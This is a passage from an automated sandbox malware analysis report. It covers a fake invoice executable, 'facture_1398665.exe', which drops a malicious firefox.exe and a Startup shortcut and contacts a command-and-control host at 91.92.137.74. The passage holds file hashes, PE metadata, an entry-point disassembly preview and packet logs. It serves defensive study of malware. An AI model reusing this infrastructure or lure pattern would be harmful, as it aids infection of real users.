SHA-512: E4F242EC6204DD481EA5B8B1EDBFB9A7C8B136D9869FB85868325B21248AA170FECDF43075361E188B20A6F138F3760226B4CFB302929E04CD3901E6CB03961A
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\dependentlibs.listProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: ASCII text, with no line terminators
Size (bytes): 11
Entropy (8bit): 2.5503407095463886
Encrypted: false
MD5: E930CCBB2F833479DD58E27A9288E128
SHA1: D58BDF26572FD015652227C9DF78AA345F4A1F80
SHA-256: F039C6C3630501F9476043356BA47B050AFDE8D534438A7E3A7135D792484932
SHA-512: 3E42C62699C0B5D2343E6FE872B11D3AD8D75104F946EC09AA48B129F3C090EDCEC9FFAEDF143AF478838E515E4D4C14FE45390C9E3ED24A1E9EB0FC3F965A06
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes): 531408
Entropy (8bit): 6.731849192407803
Encrypted: false
MD5: 52FFABA4273678BAE75442F2BC85B470
SHA1: 66A4C6CF92A4190A1480FD2B19AC84952FA715BD
SHA-256: 70225F14A28007815B0410B1F41F7EA6A16B6329FD69F7EC06386B05862CF5C4
SHA-512: 4D6E222378CC99B7CA64EC6738B97504201364760E94BA0276F272860608952E5A260B70A28246D6857404209C7B2ECEFD0C22EBA59B3788069DA7A1B39266F2
Malicious: true
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\gaddafi-sarkozy-handshake.jpgProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: JPEG image data, JFIF standard 1.02
Size (bytes): 22117
Entropy (8bit): 7.966262180259871
Encrypted: false
MD5: 2EACE55C93918524BD2F8F06B4DDBEB3
SHA1: 8EB9A69D877C96603C2F26E895BF1DC89CF1927E
SHA-256: 667BE8442298610861B8561DA6E2F4005857D0AB076A3A8FF578D9B7E3DA729E
SHA-512: DE0D89C1AC2C5C99B8607E49D2F6AE7D6BE79748BE71DE5A74B6A193A92E4CB0C600230A3893AA9C595CB3632051876507F527EB4155FFFFA1A5E253EDC21755
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 31 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes): 133072
Entropy (8bit): 6.814709386830881
Encrypted: false
MD5: E2F7B050C6C83505611807E81DB58E16
SHA1: A06A6FD60486E8B27E926F30B7D20FC7B2354EED
SHA-256: 9019976DF7D3423DCCEFF61397360BB300F693A1BF98E5BFD33AD3FBEADD24D8
SHA-512: EFB432A1389136A9F87B8834B9C78C1BAF953B84D338621E4841376D03B0A31D1F92186786C3CD8FB390A25A2ED77A2C0F1E3C49F73C57994EF684E552969407
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 440120
Entropy (8bit): 6.655941426443587
Encrypted: false
MD5: D25C3FF7A4CBBFFC7C9FFF4F659051CE
SHA1: 02FE8D84D7F74C2721FF47D72A6916028C8F2E8A
SHA-256: 9C1DC36D319382E1501CDEAAE36BAD5B820EA84393EF6149E377D2FB2FC361A5
SHA-512: 945FE55B43326C95F1EEE643D46A53B69A463A88BD149F90E9E193D71B84F4875455D37FD4F06C1307BB2CDBE99C1F6E18CB33C0B8679CD11FEA820D7E728065
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes): 875472
Entropy (8bit): 6.9224404430053434
Encrypted: false
MD5: 4BA25D2CBE1587A841DCFB8C8C4A6EA6
SHA1: 52693D4B5E0B55A929099B680348C3932F2C3C62
SHA-256: B30160E759115E24425B9BCDF606EF6EBCE4657487525EDE7F1AC40B90FF7E49
SHA-512: 82E86EC67A5C6CDDF2230872F66560F4B0C3E4C1BB672507BBB8446A8D6F62512CBD0475FE23B619DB3A67BB870F4F742761CF1F87D50DB7F14076F54006F6C6
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 917184
Entropy (8bit): 6.825553978446455
Encrypted: false
MD5: D2C5233317767EE9329F470C39B046B1
SHA1: 42493597D3DED76DAA9A3C5CAD5D4343958D0D55
SHA-256: F085B1B009AB89049BA95DD4FFDE276D5B1F6FA0055F58DC3FC0D4B03AE8116D
SHA-512: 930B31042B5DDC507D4810C10677DB9786B8A16AD8A3ED09BA0A6256DDDC9C2706D1957ABBE3071D09C8CDCC2F142914AE7F7B727DC3E9F8DD7D821D118B715A
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 83784
Entropy (8bit): 6.845861669519175
Encrypted: false
MD5: A2523EA6950E248CBDF18C9EA1A844F6
SHA1: 549C8C2A96605F90D79A872BE73EFB5D40965444
SHA-256: 6823B98C3E922490A2F97F54862D32193900077E49F0360522B19E06E6DA24B4
SHA-512: 2141C041B6BDBEE9EC10088B9D47DF02BF72143EB3619E8652296D617EFD77697F4DC8727D11998695768843B4E94A47B1AED2C6FB9F097FFC8A42CA7AAAF66A
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 32 of 149
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnkProcess: C:\Windows\System32\dllhost.exe
File Type: MS Windows shortcut
Size (bytes): 45708
Entropy (8bit): 4.844147996064094
Encrypted: false
MD5: 1BFBBC1E738037DE253A92FBC49958B1
SHA1: 6783B0E8925F4E90999D008EA91199B9A7C79F8C
SHA-256: 2B2F1BC291F409405FCB4295B5B8ACC272DBAA70E937A0E37C520736E8433789
SHA-512: 3F5155619C8DCF7CB34065802BFD3E3DD773D2EDF04C781AFA1FE817877823EE1E45072F443BEB43148B43A9BA4D80CDEDC0F9285F7A0DAE9E40F491F6393A4E
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.jsProcess: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 368
Entropy (8bit): 4.853586373412553
Encrypted: false
MD5: 57C038EDE79531E703D70493E88B584D
SHA1: 0DA5ED227B04E5C06B87A3081E0BF39D78903E7B
SHA-256: A8BBDEC0446B8CA598C2717A0EC7EABBC42ED2CDC6E2FA5E902645B0904263BA
SHA-512: ADBA59C02A7BC21AEAD4A557F18A054E53F5329CF01B72B7C626BE0536BB58A0AC2D5E70BA0CCF47FD7A1DCC739C8EFD509B6FCD7C9A6CDD7AC1ADB2497AC5BF
Malicious: false
Reputation: low
Name IP Active Malicious Antivirus Detection Reputation
truand-2-la-galere.money 91.92.137.74 true false unknown
No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs
Contacted Domains/Contacted IPs
Contacted Domains
Contacted IPs
Public
Copyright Joe Security LLC 2018 Page 33 of 149
Static File Info
GeneralFile type: PE32 executable for MS Windows (GUI) Intel 80386 32-
bit
Entropy (8bit): 7.964395891908483
TrID: Win32 Executable (generic) a (10002005/4) 99.92%Win16/32 Executable Delphi generic (2074/23) 0.02%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Java Script embedded in Visual Basic Script (1500/0) 0.01%
File name: facture_1398665.exe
File size: 2153784
MD5: fe1214a06ffc40b1ebb524f185894487
SHA1: 237b14d2aab873fed20574bd708d6840ce87a76b
SHA256: cc3674f980fda4895865507f4ebe460b7553ace60b70e2d0dea0807c68003f7b
SHA512: 29bb6fab2a6c1680dbf5440d7e4b3a96ac474b57ce4e055bffd96f928b00655c79fd1faaebd2a24fca19790183f998ccdde09a3f33b01f686cc7704ac7c664cf
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
File Icon
IP Country Flag ASN ASN Name Malicious
91.92.137.74 Bulgaria 203543 RT-ELECTRONICS-2015GazInvestProektltdBG
false
IP
GeneralEntrypoint: 0x4117dc
Entrypoint Section: .itext
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x57051F88 [Wed Apr 06 14:39:04 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 20dd26497880c05caed9305b3c8b9109
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
Private
Static PE Info
Entrypoint Preview
Copyright Joe Security LLC 2018 Page 34 of 149
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 00410144h
call 0FB7B77Dh
xor eax, eax
push ebp
push 00411EBEh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00411E7Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [00415B48h]
call 0FB83EC3h
call 0FB83A12h
cmp byte ptr [00412ADCh], 00000000h
je 0FB869BEh
call 0FB83FD8h
xor eax, eax
call 0FB79815h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 0FB80A5Bh
mov edx, dword ptr [ebp-14h]
mov eax, 00418658h
call 0FB79DEAh
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [00418658h]
mov dl, 01h
mov eax, dword ptr [0040C04Ch]
call 0FB81372h
mov dword ptr [0041865Ch], eax
xor edx, edx
push ebp
push 00411E26h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 0FB83F36h
mov dword ptr [00418664h], eax
mov eax, dword ptr [00418664h]
Instruction
Name Virtual Address Virtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT 0x19000 0xe04 .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE 0x1c000 0x1708c .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0
Data Directories
Copyright Joe Security LLC 2018 Page 35 of 149
IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0
IMAGE_DIRECTORY_ENTRY_TLS 0x1b000 0x18 .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IAT 0x19304 0x214 .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0
Name Virtual Address Virtual Size Is in Section
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
.text 0x1000 0xf244 0xf400 False 0.548171746926 ump; data 6.37521350405 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext 0x11000 0xf64 0x1000 False 0.55859375 ump; DBase 3 data file with memo(s) (251723841 records)
5.73220066616 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data 0x12000 0xc88 0xe00 False 0.253348214286 ump; data 2.29672090879 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss 0x13000 0x56bc 0x0 False 0 ump; empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata 0x19000 0xe04 0x1000 False 0.321533203125 ump; SysEx File - 4.59781255771 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls 0x1a000 0x8 0x0 False 0 ump; empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata 0x1b000 0x18 0x200 False 0.05078125 ump; data 0.20448815744 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc 0x1c000 0x1708c 0x17200 False 0.500242820946 ump; data 6.25860342437 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name RVA Size Type Language Country
RT_ICON 0x1c4dc 0x2e3d ump; PNG image, 256 x 256, 8-bit colormap, non-interlaced
English United States
RT_ICON 0x1f31c 0xea8 ump; data English United States
RT_ICON 0x201c4 0x8a8 ump; data English United States
RT_ICON 0x20a6c 0x568 ump; GLS_BINARY_LSB_FIRST English United States
RT_ICON 0x20fd4 0x4b87 ump; PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced
English United States
RT_ICON 0x25b5c 0x25a8 ump; data English United States
RT_ICON 0x28104 0x10a8 ump; data English United States
RT_ICON 0x291ac 0x468 ump; GLS_BINARY_LSB_FIRST English United States
RT_STRING 0x29614 0x68 ump; DBase 3 index file
RT_STRING 0x2967c 0xd4 ump; data
RT_STRING 0x29750 0xa4 ump; DBase 3 data file (7929953 records)
RT_STRING 0x297f4 0x2ac ump; data
RT_STRING 0x29aa0 0x34c ump; data
RT_STRING 0x29dec 0x294 ump; data
RT_RCDATA 0x2a080 0x82e8 ump; data English United States
RT_RCDATA 0x32368 0x10 ump; Sendmail frozen configuration
RT_RCDATA 0x32378 0x150 ump; data
RT_RCDATA 0x324c8 0x2c ump; data
RT_GROUP_ICON 0x324f4 0x76 ump; MS Windows icon resource - 8 icons, 256-colors English United States
RT_VERSION 0x3256c 0x4f4 ump; data English United States
RT_MANIFEST 0x32a60 0x62c ump; XML document text English United States
DLL Import
oleaut32.dll SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
Sections
Resources
Imports
Copyright Joe Security LLC 2018 Page 36 of 149
Network Behavior
Network Port Distribution
Total Packets: 695
• 443 (HTTPS)
• 53 (DNS)
kernel32.dll TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, DeleteFileW, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CloseHandle
advapi32.dll RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll InitCommonControls
kernel32.dll Sleep
advapi32.dll AdjustTokenPrivileges
DLL Import
Description Data
LegalCopyright
FileVersion
CompanyName test.
Comments This installation was built with Inno Setup.
ProductName test
ProductVersion test
FileDescription test Setup
Translation 0x0000 0x04b0
Language of compilation system Country where language is spoken Map
English United States
Timestamp Source Port Dest Port Source IP Dest IP
Mai 7, 2018 14:49:36.631899118 MESZ 63700 53 192.168.1.81 8.8.8.8
Version Infos
Possible Origin
TCP Packets
Copyright Joe Security LLC 2018 Page 37 of 149
Mai 7, 2018 14:49:36.814659119 MESZ 53 63700 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:36.882920027 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:36.882975101 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:36.883605003 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:37.122706890 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:37.122750998 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:49.415394068 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:49.415448904 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:49.415469885 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:49.415647984 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:49.480731964 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:49.480768919 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:49.482016087 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:49.483091116 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:50.436608076 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:50.475008965 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:50.485364914 MESZ 54244 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:50.615817070 MESZ 53 54244 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:50.626178980 MESZ 60413 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:50.746747017 MESZ 53 60413 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:50.974263906 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:50.975575924 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:50.975601912 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:50.979106903 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:50.991595984 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:50.997324944 MESZ 443 49162 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:50.997864008 MESZ 49162 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:51.014880896 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:51.014935017 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:51.016784906 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:51.018317938 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:51.018341064 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.041563988 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.041852951 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:52.057332993 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:52.057374954 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.101337910 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:52.101366997 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988152027 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988320112 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988338947 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988358021 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988365889 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988372087 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988382101 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988393068 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988401890 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988409996 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988862991 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:52.988890886 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988905907 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.988917112 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:52.989166975 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:52.989253044 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.120769024 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120812893 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120842934 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120866060 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120887041 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120913982 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120944977 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120955944 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120966911 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120978117 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.120987892 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.121303082 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.121334076 MESZ 443 49164 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 38 of 149
Mai 7, 2018 14:49:53.121624947 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.121705055 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.226696968 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226727962 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226736069 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226742983 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226751089 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226758957 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226780891 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226788998 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226797104 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226804972 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.226811886 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.227107048 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.227152109 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.227494955 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.227615118 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.316730022 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316766977 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316776037 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316783905 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316792011 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316800117 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316824913 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316833973 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316847086 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316854954 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.316863060 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.319443941 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.319494963 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.319746017 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.323230028 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.403023005 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403064966 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403073072 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403091908 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403101921 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403112888 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403136969 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403151035 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403162003 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403172016 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403181076 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403311014 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.403352022 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.403568029 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.404103041 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:53.474935055 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.474960089 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.474966049 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.474972010 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.474993944 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.475011110 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.475028992 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.475034952 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:53.475040913 MESZ 443 49164 91.92.137.74 192.168.1.81
